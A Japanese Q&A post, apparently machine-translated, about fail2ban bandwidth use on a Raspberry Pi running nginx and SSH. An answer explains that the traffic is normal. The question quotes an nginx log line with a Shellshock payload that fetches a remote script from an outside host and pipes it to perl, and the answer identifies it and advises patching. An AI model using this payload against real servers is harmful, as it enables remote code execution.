接続試行を制限するために、iptablesnginxとSSHサーバーがインストールされているラズベリーパイがあります。問題は、fail2banが多くの帯域幅を消費しているようです。fail2banssh
Chain fail2ban-ssh (1 references)
num pkts bytes target prot opt in out source destination
1 933 63565 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
数分間開いている間はすでに+- 60kbを消費しており、ssh昨日以降のログに誤った試みはありません。前回はバイトフィールドが14Gでした。
私の質問:Fail2banは同じ量の帯域幅を使用します。これは正常ですか?問題は他の場所で発生しますか?
また、nginxログに次のような不快なログが表示されます。
78.142.173.10 - - [21/Oct/2014:09:33:33 +0000] "GET / HTTP/1.0" 200 99 "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"
これが問題に関連している可能性がありますか?
ベストアンサー1
今数時間:
1)fail2banシステム構成のロジックを変更すると、実際に消費されません。どの帯域幅そのもの。
2) 数分で60KBはあまり帯域幅ではありません。
3)見ている60 KBの帯域幅は、エラーイベントと一致するネットワークトラフィックに使用されました。あなたはトラフィックコンストラクタではないので、トラフィックを減らすためにできることはありません。fail2banルールの一部として拒否されるという事実は、トラフィックに影響を与える可能性があることを示します。考えるブロックされました。
4)nginxログは、リモート攻撃者がシェルショックの脆弱性を利用しようとしていることを示します。完全にパッチがあることを確認します。
全体として、システムは実際に期待通りに実行されています。彼らの要求をブロックするための措置を講じたい場合は、彼らが実行しているVPSを追跡し、そのプロバイダに電子メールを送信して、ネットワークで発生した悪用を報告することができます。
編集する:
曲がった関心で調査した結果、攻撃者のIPはsonne.publicmanagement.atwhoisに従ってそのドメインの連絡先として確認[email protected]され[email protected]、直接電子メールを送信することができます。この攻撃がドイツのプロバイダーによって提供されたが、韓国のウェブサイトに見えるところからエクスプロイトをもたらしたことを考慮すると、プロバイダーはこのようなことが起こっているという事実を合法的に知らなかった可能性があり、これは自分たちがルーティングした箱の一つである。かもしれません(おそらく同様のファッション)